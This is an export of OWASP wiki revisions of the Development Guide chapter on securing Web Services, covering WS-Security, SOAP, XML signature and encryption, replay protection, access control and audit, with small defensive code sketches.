A popular choice among Web Service developers today is Sun’s JWSDP, which includes support for Web Service security. However, its support for the Web Service security specifications in version 1.5 is limited to an implementation of the core WSS standard with the username and X.509 certificate profiles. Security features are implemented as part of the JAX-RPC framework and are configuration-driven, which allows for clean separation from the Web Service’s implementation.&lt;br /&gt;
&lt;br /&gt;
===Hardware, software systems ===&lt;br /&gt;
&lt;br /&gt;
This category includes complete systems, rather than toolkits or frameworks. On the one hand, they usually provide rich functionality right off the shelf; on the other hand, their usage model is rigidly constrained by the solution’s architecture and implementation. This is in contrast to the toolkits, which do not provide any services by themselves, but hand system developers the necessary tools to include the desired Web Service security features in their products… or to shoot themselves in the foot by applying them inappropriately.&lt;br /&gt;
&lt;br /&gt;
These systems can be used at the infrastructure layer to verify incoming messages against the effective policy, checking signatures, tokens, etc., before passing them on to the target Web Service. When applied to the outgoing SOAP messages, they act as a proxy, altering the messages to decorate them with the required security elements, and signing and/or encrypting them.&lt;br /&gt;
&lt;br /&gt;
Software systems are characterized by significant configuration flexibility, but comparatively slow processing. On the bright side, they often provide a high level of integration with the existing enterprise infrastructure, relying on back-end user and policy stores to view the credentials extracted from the WSS header from a broader perspective. An example of such a system is TransactionMinder from the former Netegrity – a Policy Enforcement Point for the Web Services behind it, layered on top of the Policy Server, which makes policy decisions by checking the extracted credentials against the configured stores and policies.&lt;br /&gt;
&lt;br /&gt;
For hardware systems, performance is the key – they have already broken the gigabyte processing threshold, and allow for real-time processing of huge documents decorated according to a variety of the latest Web Service security standards, not only WSS. Usage simplicity is another attractive point of those systems – in the most trivial cases, the hardware box may literally be dropped in, plugged in, and used right away. These qualities come with a price, however – this performance and simplicity can be achieved only as long as the user stays within the pre-configured confines of the hardware box. The moment he tries to integrate with the back-end stores via callbacks (for those solutions that have this capability, since not all of them do), most of the advantages are lost. As an example of such a hardware device, Layer 7 Technologies provides a scalable SecureSpan Networking Gateway, which acts both as an inbound firewall and an outbound proxy to handle XML traffic in real time.&lt;br /&gt;
&lt;br /&gt;
==Problems ==&lt;br /&gt;
&lt;br /&gt;
As is probably clear from the previous sections, Web Services are still experiencing a lot of turbulence, and it will take a while before they can really catch on. Here is a brief look at what problems surround currently existing security standards and their implementations.&lt;br /&gt;
&lt;br /&gt;
===Immaturity of the standards ===&lt;br /&gt;
&lt;br /&gt;
Most of the standards are either very recent (a couple of years old at most) or still being developed. Although standards development is done in committees, which, presumably, reduces risks by going through an exhaustive reviewing and commenting process, some error scenarios still slip in periodically, as no amount of theory can match the testing that results from pounding by thousands of developers working in the field. &lt;br /&gt;
&lt;br /&gt;
Additionally, it does not help that for political reasons some of these standards are withheld from public process, which is the case with many standards from the WSA arena (see 0), or that some of the efforts are duplicated, as was the case with LA and WS-Federation specifications.&lt;br /&gt;
[[Category:FIXME|Please check the reference (see 0)]]&lt;br /&gt;
&lt;br /&gt;
===Performance ===&lt;br /&gt;
&lt;br /&gt;
XML parsing is a slow task, which is an accepted reality, and SOAP processing slows it down even more. Now, with expensive cryptographic and textual conversion operations thrown into the mix, these tasks become a performance bottleneck, even with the latest crypto- and XML-processing hardware solutions offered today. All of the products currently on the market are facing this issue, and they are trying to resolve it with varying degrees of success. &lt;br /&gt;
&lt;br /&gt;
Hardware solutions, while substantially (by orders of magnitude) improving the performance, cannot always be used as an optimal solution, as they cannot be easily integrated with already existing back-end software infrastructure – at least, not without making performance sacrifices. Another consideration in deciding whether hardware-based systems are the right solution is that they are usually highly specialized in what they do, while modern Application Servers and security frameworks can usually offer a much greater variety of protection mechanisms, protecting not only Web Services but also other deployed applications in a uniform and consistent way.&lt;br /&gt;
&lt;br /&gt;
===Complexity and interoperability ===&lt;br /&gt;
&lt;br /&gt;
As can be deduced from the previous sections, Web Service security standards are fairly complex and have a very steep learning curve associated with them. Most of the current products dealing with Web Service security suffer from very mediocre usability due to the complexity of the underlying infrastructure. Configuring all the different policies, identities, keys, and protocols takes a lot of time and a good understanding of the involved technologies, as most of the time the errors that end users see have very cryptic and misleading descriptions. &lt;br /&gt;
&lt;br /&gt;
In order to help administrators and reduce security risks from service misconfigurations, many companies develop policy templates, which group together best practices for protecting incoming and outgoing SOAP messages. Unfortunately, this work is not currently on the radar of any of the standards bodies, so it appears unlikely that such templates will be released for public use any time soon. Closest to this effort may be WS-I’s Basic Security Profile (BSP), which tries to define the rules for better interoperability among Web Services, using a subset of common security features from various security standards like WSS. However, this work is not aimed at supplying administrators with ready-for-deployment security templates matching the most popular business use cases, but rather at establishing the least common denominator.&lt;br /&gt;
&lt;br /&gt;
===Key management ===&lt;br /&gt;
&lt;br /&gt;
Key management usually lies at the foundation of any other security activity, as most protection mechanisms rely on cryptographic keys in one way or another. While Web Services have the XKMS protocol for key distribution, local key management still presents a huge challenge in most cases, since the PKI mechanism has a lot of well-documented deployment and usability issues. Those systems that opt to use homegrown mechanisms for key management run significant risks, since the questions of storing, updating, and recovering secret and private keys are more often than not inadequately addressed in such solutions.&lt;br /&gt;
&lt;br /&gt;
==Further Reading ==&lt;br /&gt;
&lt;br /&gt;
* SearchSOA, SOA needs practical operational governance, Toufic Boubez&lt;br /&gt;
&lt;br /&gt;
&amp;lt;u&amp;gt;http://searchsoa.techtarget.com/news/interview/0,289202,sid26_gci1288649,00.html?track=NL-110&amp;amp;ad=618937&amp;amp;asrc=EM_NLN_2827289&amp;amp;uid=4724698&amp;lt;/u&amp;gt;&lt;br /&gt;
&lt;br /&gt;
* Whitepaper: Securing XML Web Services: XML Firewalls and XML VPNs&lt;br /&gt;
&lt;br /&gt;
&amp;lt;u&amp;gt;http://layer7tech.com/new/library/custompage.html?id=4&amp;lt;/u&amp;gt;&lt;br /&gt;
&lt;br /&gt;
* eBizQ, The Challenges of SOA Security, Peter Schooff&lt;br /&gt;
&lt;br /&gt;
&amp;lt;u&amp;gt;http://www.ebizq.net/blogs/news_security/2008/01/the_complexity_of_soa_security.php&amp;lt;/u&amp;gt;&lt;br /&gt;
&lt;br /&gt;
* Piliptchouk, D., WS-Security in the Enterprise, O’Reilly ONJava&lt;br /&gt;
&lt;br /&gt;
&amp;lt;u&amp;gt;http://www.onjava.com/pub/a/onjava/2005/02/09/wssecurity.html&amp;lt;/u&amp;gt; &lt;br /&gt;
&lt;br /&gt;
&amp;lt;u&amp;gt;http://www.onjava.com/pub/a/onjava/2005/03/30/wssecurity2.html&amp;lt;/u&amp;gt; &lt;br /&gt;
&lt;br /&gt;
* WS-Security OASIS site&lt;br /&gt;
&lt;br /&gt;
&amp;lt;u&amp;gt;http://www.oasis-open.org/committees/tc_home.php?wg_abbrev=wss&amp;lt;/u&amp;gt; &lt;br /&gt;
&lt;br /&gt;
* Microsoft, ''What’s new with WSE 3.0''&lt;br /&gt;
&lt;br /&gt;
&amp;lt;u&amp;gt;http://msdn.microsoft.com/webservices/webservices/building/wse/default.aspx?pull=/library/en-us/dnwse/html/newwse3.asp&amp;lt;/u&amp;gt; &lt;br /&gt;
&lt;br /&gt;
* Eoin Keary, Preventing DOS attacks on web services&lt;br /&gt;
&lt;br /&gt;
&amp;lt;u&amp;gt;https://www.threatsandcountermeasures.com/wiki/default.aspx/ThreatsAndCountermeasuresCommunityKB.PreventingDOSAttacksOnWebServices&amp;lt;/u&amp;gt;&lt;br /&gt;
[[category:FIXME | broken link]]&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==Reference==&lt;br /&gt;
[[Guide Table of Contents|Development Guide Table of Contents]]&lt;br /&gt;
[[Category:OWASP_Guide_Project]]&lt;br /&gt;
[[Category:Web Services]]&lt;/div&gt;</summary>
		<author><name>KirstenS</name></author>	</entry>

	<entry>
		<id>https://wiki.owasp.org/index.php?title=Web_Services&amp;diff=59470</id>
		<title>Web Services</title>
		<link rel="alternate" type="text/html" href="https://wiki.owasp.org/index.php?title=Web_Services&amp;diff=59470"/>
				<updated>2009-04-26T11:57:12Z</updated>
		
		<summary type="html">&lt;p&gt;KirstenS: /* Referencing message parts */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;[[Guide Table of Contents|Development Guide Table of Contents]]&lt;br /&gt;
__TOC__&lt;br /&gt;
[[Category:FIXME|This article has a lot of what I think are placeholders for references. It says &amp;quot;see section 0&amp;quot; and I think those are intended to be replaced with actual sections. I have noted them where I have found them. Need to figure out what those intended to reference, and change the reference]]&lt;br /&gt;
This section of the Development Guide details the common issues facing Web Services developers, and methods to address them. Due to space limitations, it cannot look at all of the surrounding issues in great detail, since each of them deserves a separate book of its own. Instead, an attempt is made to steer the reader to the appropriate usage patterns, and to warn about potential roadblocks along the way.&lt;br /&gt;
&lt;br /&gt;
Web Services have received a lot of press, and with that comes a great deal of confusion over what they really are. Some are heralding Web Services as the biggest technology breakthrough since the web itself; others are more skeptical, seeing them as nothing more than evolved web applications. In either case, the issues of web application security apply to web services just as they do to web applications. &lt;br /&gt;
&lt;br /&gt;
==What are Web Services?==&lt;br /&gt;
&lt;br /&gt;
Suppose you were making an application that you wanted other applications to be able to communicate with.  For example, your Java application has stock information updated every 5 minutes and you would like other applications, ones that may not even exist yet, to be able to use the data.&lt;br /&gt;
&lt;br /&gt;
One way you can do this is to serialize your Java objects and send them over the wire to the application that requests them.  The problem with this approach is that a C# application would not be able to use these objects because it serializes and deserializes objects differently than Java.  &lt;br /&gt;
&lt;br /&gt;
Another approach you could take is to send a text file filled with data to the application that requests it.  This is better, because a C# application could read the data.  But this has another flaw: let's assume your stock application is not the only one the C# application needs to interact with.  Maybe it needs weather data, local restaurant data, movie data, etc.  If every one of these applications uses its own unique file format, it would take considerable research to get the C# application to a working state.  &lt;br /&gt;
&lt;br /&gt;
The solution to both of these problems is to send a standard file format – one that any application can use, regardless of the data being transported.  Web Services are this solution.  They let any application communicate with any other application without having to consider the language it was developed in or the format of the data.  &lt;br /&gt;
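The idea can be made concrete with a tiny sketch (Python here; the stock-quote schema is invented for illustration) – the producer emits standard XML, and any consumer, whatever its language, parses it the same way:

```python
import xml.etree.ElementTree as ET

def quote_to_xml(symbol: str, price: float) -> str:
    """Serialize a stock quote into a language-neutral XML document."""
    quote = ET.Element("quote")
    ET.SubElement(quote, "symbol").text = symbol
    ET.SubElement(quote, "price").text = str(price)
    return ET.tostring(quote, encoding="unicode")

def quote_from_xml(document: str):
    """Any XML-capable consumer (Java, C#, ...) can apply the same parsing logic."""
    root = ET.fromstring(document)
    return root.findtext("symbol"), float(root.findtext("price"))
```

A Java producer and a C# consumer exchanging the same document need to agree only on the schema, not on each other's object serialization formats.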
&lt;br /&gt;
At the simplest level, web services can be seen as a specialized web application that differs mainly at the presentation tier level. While web applications typically are HTML-based, web services are XML-based. Interactive users for B2C (business to consumer) transactions normally access web applications, while web services are employed as building blocks by other web applications for forming B2B (business to business) chains using the so-called SOA model. Web services typically present a public functional interface, callable in a programmatic fashion, while web applications tend to deal with a richer set of features and are content-driven in most cases. &lt;br /&gt;
&lt;br /&gt;
==Securing Web Services ==&lt;br /&gt;
&lt;br /&gt;
Web services, like other distributed applications, require protection at multiple levels:&lt;br /&gt;
&lt;br /&gt;
* SOAP messages that are sent on the wire should be delivered confidentially and without tampering&lt;br /&gt;
&lt;br /&gt;
* The server needs to be confident who it is talking to and what the clients are entitled to&lt;br /&gt;
&lt;br /&gt;
* The clients need to know that they are talking to the right server, and not a phishing site (see the Phishing chapter for more information)&lt;br /&gt;
&lt;br /&gt;
* System message logs should contain sufficient information to reliably reconstruct the chain of events and track those back to the authenticated callers&lt;br /&gt;
&lt;br /&gt;
Correspondingly, the high-level approaches to solutions, discussed in the following sections, are valid for pretty much any distributed application, with some variations in the implementation details.&lt;br /&gt;
&lt;br /&gt;
The good news for Web Services developers is that these are infrastructure-level tasks, so, theoretically, it is only the system administrators who should be worrying about these issues. However, for a number of reasons discussed later in this chapter, WS developers usually have to be at least aware of all these risks, and oftentimes they still have to resort to manually coding or tweaking the protection components.&lt;br /&gt;
&lt;br /&gt;
==Communication security ==&lt;br /&gt;
&lt;br /&gt;
There is a commonly cited statement, and an even more often implemented approach – “we are using SSL to protect all communication, so we are secure”. At the same time, there have been so many articles published on the topic of “channel security vs. token security” that it hardly makes sense to repeat those arguments here. Therefore, listed below is just a brief rundown of the most common pitfalls of using channel security alone:&lt;br /&gt;
&lt;br /&gt;
* It provides only “point-to-point” security&lt;br /&gt;
&lt;br /&gt;
Any communication with multiple “hops” requires establishing separate channels (and trusts) between each communicating node along the way. There is also a subtle issue of trust transitivity, as trusts between node pairs {A,B} and {B,C} do not automatically imply {A,C} trust relationship.&lt;br /&gt;
&lt;br /&gt;
* Storage issue&lt;br /&gt;
&lt;br /&gt;
After messages are received on a server (even if it is not the intended recipient), they exist in clear-text form, at least temporarily. Storing the transmitted information at the intermediate or destination servers in log files (where it can be browsed by anybody) and local caches aggravates the problem.&lt;br /&gt;
&lt;br /&gt;
* Lack of interoperability&lt;br /&gt;
&lt;br /&gt;
While SSL provides a standard mechanism for transport protection, applications then have to utilize highly proprietary mechanisms for transmitting credentials, ensuring freshness, integrity, and confidentiality of data sent over the secure channel. Using a different server, which is semantically equivalent, but accepts a different format of the same credentials, would require altering the client and prevent forming automatic B2B service chains. &lt;br /&gt;
&lt;br /&gt;
Standards-based token protection in many cases provides a superior alternative for message-oriented Web Service SOAP communication model.&lt;br /&gt;
&lt;br /&gt;
That said – the reality is that most Web Services today are still protected by some form of channel security mechanism, which alone might suffice for a simple internal application. However, one should clearly realize the limitations of such an approach, and make conscious trade-offs at design time as to whether channel, token, or combined protection would work better for each specific case.&lt;br /&gt;
&lt;br /&gt;
==Passing credentials ==&lt;br /&gt;
&lt;br /&gt;
In order to enable credentials exchange and authentication for Web Services, their developers must address the following issues.&lt;br /&gt;
&lt;br /&gt;
First, since SOAP messages are XML-based, all passed credentials have to be converted to a text format. This is not a problem for username/password types of credentials, but binary ones (like X.509 certificates or Kerberos tokens) require conversion to text prior to sending and unambiguous restoration upon receiving, which is usually done via a procedure called Base64 encoding and decoding.&lt;br /&gt;
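The Base64 round trip is a one-liner on most platforms; a Python sketch (the token bytes are a stand-in for a real binary credential):

```python
import base64

# Stand-in for a binary credential such as a DER-encoded X.509 certificate
# or a Kerberos ticket (real token bytes would come from the security stack).
binary_token = bytes(range(256))

# Base64 turns the bytes into plain text that can be embedded in an XML
# message, and decoding restores them unambiguously on the receiving side.
encoded = base64.b64encode(binary_token).decode("ascii")
decoded = base64.b64decode(encoded)

assert decoded == binary_token
```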
&lt;br /&gt;
Second, passing credentials carries an inherent risk of their disclosure – either by sniffing them during the wire transmission, or by analyzing the server logs. Therefore, things like passwords and private keys need to be either encrypted or never sent “in the clear” at all. The usual ways to avoid sending sensitive credentials are cryptographic hashing and/or signatures.&lt;br /&gt;
&lt;br /&gt;
==Ensuring message freshness ==&lt;br /&gt;
&lt;br /&gt;
Even a valid message may present a danger if it is utilized in a “replay attack” – i.e., it is sent multiple times to the server to make it repeat the requested operation. This may be achieved by capturing an entire message – even one sufficiently protected against tampering – since it is the message itself that is now used for the attack (see the XML Injection section of the Interpreter Injection chapter).&lt;br /&gt;
&lt;br /&gt;
The usual means of protecting against replayed messages is either using unique identifiers (nonces) on messages and keeping track of processed ones, or using a relatively short validity time window. In the Web Services world, information about the message creation time is usually communicated by inserting timestamps, which may just state the instant the message was created, or carry additional information, like its expiration time or certain conditions.&lt;br /&gt;
&lt;br /&gt;
The latter solution, although easier to implement, requires clock synchronization and is sensitive to “server time skew,” where the server’s or clients’ clocks drift so far apart that timely message delivery is prevented – although this usually does not present significant problems with modern-day computers. A greater issue lies with message queuing at the servers, where messages may expire while waiting to be processed in the queue of an especially busy or non-responsive server.&lt;br /&gt;
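&lt;br /&gt;
Taken together, the nonce cache and the validity window amount to only a few lines of code. The sketch below is illustrative – the class name and the five-minute window are inventions for this example, not part of any WS specification:&lt;br /&gt;
&lt;br /&gt;
```python
import time

class ReplayGuard:
    """Rejects messages whose nonce was already seen or whose timestamp is stale."""

    def __init__(self, window_seconds=300):
        self.window = window_seconds
        self.seen = {}  # nonce -> creation time of the accepted message

    def accept(self, nonce, created, now=None):
        now = time.time() if now is None else now
        # Freshness check: discard messages outside the validity window.
        if abs(now - created) > self.window:
            return False
        # Uniqueness check: discard nonces we have already processed.
        if nonce in self.seen:
            return False
        # Forget nonces that have aged out; they can no longer pass the
        # freshness check anyway, so the cache stays bounded.
        self.seen = {n: t for n, t in self.seen.items() if abs(now - t) <= self.window}
        self.seen[nonce] = created
        return True
```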
&lt;br /&gt;
==Protecting message integrity ==&lt;br /&gt;
&lt;br /&gt;
When a message is received by a web service, the service must always ask two questions: “Do I trust the caller?” and “Did the caller create this message?” Assuming that caller trust has been established one way or another, the server has to be assured that the message it is looking at was indeed issued by the caller, and not altered along the way (intentionally or not). An alteration may affect technical qualities of a SOAP message, such as the message’s timestamp, or business content, such as the amount to be withdrawn from a bank account. Obviously, neither change should go undetected by the server.&lt;br /&gt;
&lt;br /&gt;
In communication protocols, there are usually mechanisms such as checksums to ensure a packet’s integrity. These would not be sufficient, however, in the realm of publicly exposed Web Services, since checksums (or digests, their cryptographic equivalents) are easily replaceable and cannot be reliably traced back to the issuer. The required association may be established by utilizing HMAC, or by combining message digests with either cryptographic signatures or secret-key encryption (assuming the keys are known only to the two communicating parties), so that any change will immediately result in a cryptographic error.&lt;br /&gt;
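&lt;br /&gt;
The distinction is easy to demonstrate with Python’s standard hmac module (the key and message values below are illustrative):&lt;br /&gt;
&lt;br /&gt;
```python
import hashlib
import hmac

key = b"secret-shared-only-by-the-two-parties"
message = b"<amount>100</amount>"
forged = b"<amount>9999</amount>"

# A plain digest offers no origin protection: whoever alters the message
# can simply recompute the digest over the altered content.
replaceable = hashlib.sha256(forged).hexdigest()

# An HMAC binds the digest to the shared key, so an altered message no
# longer verifies against the original authentication code.
tag = hmac.new(key, message, hashlib.sha256).hexdigest()
assert not hmac.compare_digest(tag, hmac.new(key, forged, hashlib.sha256).hexdigest())
```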
&lt;br /&gt;
==Protecting message confidentiality ==&lt;br /&gt;
&lt;br /&gt;
Oftentimes, ensuring integrity is not sufficient – in many cases it is also desirable that nobody can see the data being passed around and/or stored locally. This may apply to the entire message or only to certain parts of it – in either case, some type of encryption is required to conceal the content. Normally, symmetric encryption algorithms are used to encrypt bulk data, since they are significantly faster than asymmetric ones. Asymmetric encryption is then applied to protect the symmetric session keys, which, in many implementations, are valid for one communication only and are subsequently discarded.&lt;br /&gt;
&lt;br /&gt;
Applying encryption requires extensive setup work, since the communicating parties now have to be aware of which keys they can trust, deal with certificate and key validation, and know which keys should be used for communication.&lt;br /&gt;
&lt;br /&gt;
In many cases, encryption is combined with signatures to provide both integrity and confidentiality. Normally, signing keys are different from the encrypting ones, primarily because of their different lifecycles – signing keys are permanently associated with their owners, while encryption keys may be invalidated after the message exchange. Another reason may be separation of business responsibilities: the signing authority (and the corresponding key) may belong to one department or person, while encryption keys are generated by a server controlled by the IT department. &lt;br /&gt;
&lt;br /&gt;
==Access control ==&lt;br /&gt;
&lt;br /&gt;
After the message has been received and successfully validated, the server must decide:&lt;br /&gt;
&lt;br /&gt;
* Does it know who is requesting the operation? (Identification)&lt;br /&gt;
&lt;br /&gt;
* Does it trust the caller’s identity claim? (Authentication)&lt;br /&gt;
&lt;br /&gt;
* Does it allow the caller to perform this operation? (Authorization)&lt;br /&gt;
&lt;br /&gt;
There is not much WS-specific activity that takes place at this stage – just several new ways of passing the credentials for authentication. Most often, authorization (or entitlement) tasks occur completely outside of the Web Service implementation, at the Policy Server that protects the whole domain.&lt;br /&gt;
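&lt;br /&gt;
The three decisions map naturally onto a short pipeline. The sketch below is purely illustrative – the token store and policy table are invented stand-ins for a real user directory and a Policy Server:&lt;br /&gt;
&lt;br /&gt;
```python
# Hypothetical stand-ins for a user directory and a Policy Server.
KNOWN_CALLERS = {"alice": "token-123"}                  # identification data
POLICY = {("alice", "getQuote"): True,                  # authorization rules
          ("alice", "transferFunds"): False}

def authorize(caller, token, operation):
    # Identification: is the caller known at all?
    if caller not in KNOWN_CALLERS:
        return False
    # Authentication: does the presented token back the identity claim?
    if KNOWN_CALLERS[caller] != token:
        return False
    # Authorization: is this caller entitled to perform this operation?
    return POLICY.get((caller, operation), False)
```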
&lt;br /&gt;
There is another significant problem here – traditional HTTP firewalls do not help stop attacks against Web Services. An organization would need an XML/SOAP firewall, which is capable of conducting application-level analysis of the web server’s traffic and making intelligent decisions about passing SOAP messages to their destination. The reader will need to refer to other books and publications on this very important topic, as it is impossible to cover it within just one chapter.&lt;br /&gt;
&lt;br /&gt;
==Audit ==&lt;br /&gt;
&lt;br /&gt;
A common task, typically required by audits, is reconstructing the chain of events that led to a certain problem. Normally, this is achieved by saving server logs in a secure location, available only to IT administrators and system auditors, in order to create what is commonly referred to as an “audit trail”. Web Services are no exception to this practice, and follow the general approach of other types of Web Applications.&lt;br /&gt;
&lt;br /&gt;
Another auditing goal is non-repudiation, meaning that a message can be verifiably traced back to the caller. Following the standard legal practice, electronic documents now require some form of an “electronic signature”, but its definition is extremely broad and can mean practically anything – in many cases, entering your name and birthday qualifies as an e-signature.&lt;br /&gt;
&lt;br /&gt;
As far as Web Services are concerned, such a level of protection would be insufficient and easily forgeable. The standard practice is to require cryptographic digital signatures over any content that has to be legally binding – if a document with such a signature is saved in the audit log, it can be reliably traced to the owner of the signing key. &lt;br /&gt;
&lt;br /&gt;
==Web Services Security Hierarchy ==&lt;br /&gt;
&lt;br /&gt;
Technically speaking, Web Services themselves are very simple and versatile: XML-based communication, described by an XML-based grammar called Web Services Description Language (WSDL, see &amp;lt;u&amp;gt;http://www.w3.org/TR/2005/WD-wsdl20-20050510&amp;lt;/u&amp;gt;), which binds abstract service interfaces – consisting of messages, expressed as XML Schema, and operations – to the underlying wire format. Although it is by no means a requirement, the format of choice is currently SOAP over HTTP. This means that Web Service interfaces are described in terms of the incoming and outgoing SOAP messages, transmitted over the HTTP protocol.&lt;br /&gt;
&lt;br /&gt;
===Standards committees ===&lt;br /&gt;
&lt;br /&gt;
Before reviewing the individual standards, it is worth taking a brief look at the organizations which are developing and promoting them. There are quite a few industry-wide groups and consortiums working in this area, most important of which are listed below. &lt;br /&gt;
&lt;br /&gt;
W3C (see &amp;lt;u&amp;gt;http://www.w3.org&amp;lt;/u&amp;gt;) is the most well known industry group, which owns many Web-related standards and develops them in Working Group format. Of particular interest to this chapter are XML Schema, SOAP, XML-dsig, XML-enc, and WSDL standards (called recommendations in the W3C’s jargon).&lt;br /&gt;
&lt;br /&gt;
OASIS (see &amp;lt;u&amp;gt;http://www.oasis-open.org&amp;lt;/u&amp;gt;) mostly deals with Web Service-specific standards, not necessarily security-related. It also operates on a committee basis, forming so-called Technical Committees (TC) for the standards that it is going to be developing. Of interest for this discussion, OASIS owns WS-Security and SAML standards. &lt;br /&gt;
&lt;br /&gt;
Web Services Interoperability Organization (WS-I, see &amp;lt;u&amp;gt;http://www.ws-i.org/&amp;lt;/u&amp;gt;) was formed to promote a general framework for interoperable Web Services. Mostly its work consists of taking other broadly accepted standards, and developing so-called profiles, or sets of requirements for conforming Web Service implementations. In particular, its Basic Security Profile (BSP) relies on the OASIS’ WS-Security standard and specifies sets of optional and required security features in Web Services that claim interoperability.&lt;br /&gt;
&lt;br /&gt;
Liberty Alliance (LA, see &amp;lt;u&amp;gt;http://projectliberty.org&amp;lt;/u&amp;gt;) consortium was formed to develop and promote an interoperable Identity Federation framework. Although this framework is not strictly Web Service-specific, but rather general, it is important for this topic because of its close relation with the SAML standard developed by OASIS. &lt;br /&gt;
&lt;br /&gt;
Besides the previously listed organizations, there are other industry associations, both permanently established and short-lived, which push forward various Web Service security activities. They are usually made up of software industry’s leading companies, such as Microsoft, IBM, Verisign, BEA, Sun, and others, that join them to work on a particular issue or proposal. Results of these joint activities, once they reach certain maturity, are often submitted to standardizations committees as a basis for new industry standards.&lt;br /&gt;
&lt;br /&gt;
==SOAP ==&lt;br /&gt;
&lt;br /&gt;
Simple Object Access Protocol (SOAP, see &amp;lt;u&amp;gt;http://www.w3.org/TR/2003/REC-soap12-part1-20030624/&amp;lt;/u&amp;gt;) provides an XML-based framework for exchanging structured and typed information between peer services. This information, formatted into Header and Body, can theoretically be transmitted over a number of transport protocols, but only HTTP binding has been formally defined and is in active use today. SOAP provides for Remote Procedure Call-style (RPC) interactions, similar to remote function calls, and Document-style communication, with message contents based exclusively on XML Schema definitions in the Web Service’s WSDL. Invocation results may be optionally returned in the response message, or a Fault may be raised, which is roughly equivalent to using exceptions in traditional programming languages.&lt;br /&gt;
&lt;br /&gt;
SOAP protocol, while defining the communication framework, provides no help in terms of securing message exchanges – the communications must either happen over secure channels, or use protection mechanisms described later in this chapter. &lt;br /&gt;
&lt;br /&gt;
===XML security specifications (XML-dsig &amp;amp; Encryption) ===&lt;br /&gt;
&lt;br /&gt;
XML Signature (XML-dsig, see &amp;lt;u&amp;gt;http://www.w3.org/TR/2002/REC-xmldsig-core-20020212&amp;lt;/u&amp;gt;/), and XML Encryption (XML-enc, see &amp;lt;u&amp;gt;http://www.w3.org/TR/2002/REC-xmlenc-core-20021210/&amp;lt;/u&amp;gt;) add cryptographic protection to plain XML documents. These specifications add integrity, message and signer authentication, as well as support for encryption/decryption of whole XML documents or only of some elements inside them. &lt;br /&gt;
&lt;br /&gt;
The real value of those standards comes from the highly flexible framework developed to reference the data being processed (both internal and external relative to the XML document), refer to the secret keys and key pairs, and to represent results of signing/encrypting operations as XML, which is added to/substituted in the original document.&lt;br /&gt;
&lt;br /&gt;
However, by themselves, XML-dsig and XML-enc do not solve the problem of securing SOAP-based Web Service interactions, since the client and service first have to agree on the order of those operations, where to look for the signature, how to retrieve cryptographic tokens, which message elements should be signed and encrypted, how long a message is considered to be valid, and so on. These issues are addressed by the higher-level specifications, reviewed in the following sections.&lt;br /&gt;
&lt;br /&gt;
===Security specifications ===&lt;br /&gt;
&lt;br /&gt;
In addition to the above standards, there is a broad set of security-related specifications being currently developed for various aspects of Web Service operations. &lt;br /&gt;
&lt;br /&gt;
One of them is SAML, which defines how identity, attribute, and authorization assertions should be exchanged among participating services in a secure and interoperable way. &lt;br /&gt;
&lt;br /&gt;
A broad consortium, headed by Microsoft and IBM, with the input from Verisign, RSA Security, and other participants, developed a family of specifications, collectively known as “Web Services Roadmap”. Its foundation, WS-Security, has been submitted to OASIS and became an OASIS standard in 2004. Other important specifications from this family are still found in different development stages, and plans for their submission have not yet been announced, although they cover such important issues as security policies (WS-Policy et al), trust issues and security token exchange (WS-Trust), establishing context for secure conversation (WS-SecureConversation). One of the specifications in this family, WS-Federation, directly competes with the work being done by the LA consortium, and, although it is supposed to be incorporated into the Longhorn release of Windows, its future is not clear at the moment, since it has been significantly delayed and presently does not have industry momentum behind it.&lt;br /&gt;
&lt;br /&gt;
==WS-Security Standard ==&lt;br /&gt;
&lt;br /&gt;
WS-Security specification (WSS) was originally developed by Microsoft, IBM, and Verisign as part of a “Roadmap”, which was later renamed Web Services Architecture, or WSA. WSS served as the foundation for all other specifications in this domain, creating a basic infrastructure for developing message-based security exchange. Because of its importance for establishing interoperable Web Services, it was submitted to OASIS and, after undergoing the required committee process, became an officially accepted standard. Version 1.0 was approved in 2004; version 1.1 of the specification followed and became an OASIS standard in February 2006.&lt;br /&gt;
&lt;br /&gt;
===Organization of the standard ===&lt;br /&gt;
&lt;br /&gt;
The WSS standard itself deals with several core security areas, leaving many details to so-called profile documents. The core areas, broadly defined by the standard, are: &lt;br /&gt;
&lt;br /&gt;
* Ways to add security headers (WSSE Header) to SOAP Envelopes&lt;br /&gt;
&lt;br /&gt;
* Attachment of security tokens and credentials to the message &lt;br /&gt;
&lt;br /&gt;
* Inserting a timestamp&lt;br /&gt;
&lt;br /&gt;
* Signing the message&lt;br /&gt;
&lt;br /&gt;
* Encrypting the message	&lt;br /&gt;
&lt;br /&gt;
* Extensibility&lt;br /&gt;
&lt;br /&gt;
The flexibility of the WS-Security standard lies in its extensibility, so that it remains adaptable to new types of security tokens and protocols as they are developed. This flexibility is achieved by defining additional profiles for inserting new types of security tokens into the WSS framework. While the signing and encrypting parts of the standard are not expected to require significant changes (only when the underlying XML-dsig and XML-enc are updated), the types of tokens passed in WSS messages, and the ways of attaching them to a message, may vary substantially. At a high level, the WSS standard defines three types of security tokens attachable to a WSS Header: Username/password, Binary, and XML tokens. Each of these types is further specified in one (or more) profile documents, which define the additional token attributes and elements needed to represent a particular type of security token. &lt;br /&gt;
&lt;br /&gt;
[[Image:WSS_Specification_Hierarchy.gif|Figure 4: WSS specification hierarchy]]&lt;br /&gt;
&lt;br /&gt;
===Purpose ===&lt;br /&gt;
&lt;br /&gt;
The primary goal of the WSS standard is to provide tools for message-level communication protection, in which each message represents an isolated piece of information, carrying enough security data to verify all important message properties – such as authenticity, integrity, and freshness – and to initiate decryption of any encrypted message parts. This concept stands in stark contrast to traditional channel security, which methodically applies a pre-negotiated security context to the whole stream, as opposed to the selective process of securing individual messages in WSS. In the Roadmap, that type of service is eventually expected to be provided by implementations of standards like WS-SecureConversation.&lt;br /&gt;
&lt;br /&gt;
From the beginning, the WSS standard was conceived as a message-level toolkit for securely delivering data for higher level protocols. Those protocols, based on the standards like WS-Policy, WS-Trust, and Liberty Alliance, rely on the transmitted tokens to implement access control policies, token exchange, and other types of protection and integration. However, taken alone, the WSS standard does not mandate any specific security properties, and an ad-hoc application of its constructs can lead to subtle security vulnerabilities and hard to detect problems, as is also discussed in later sections of this chapter.&lt;br /&gt;
&lt;br /&gt;
==WS-Security Building Blocks ==&lt;br /&gt;
&lt;br /&gt;
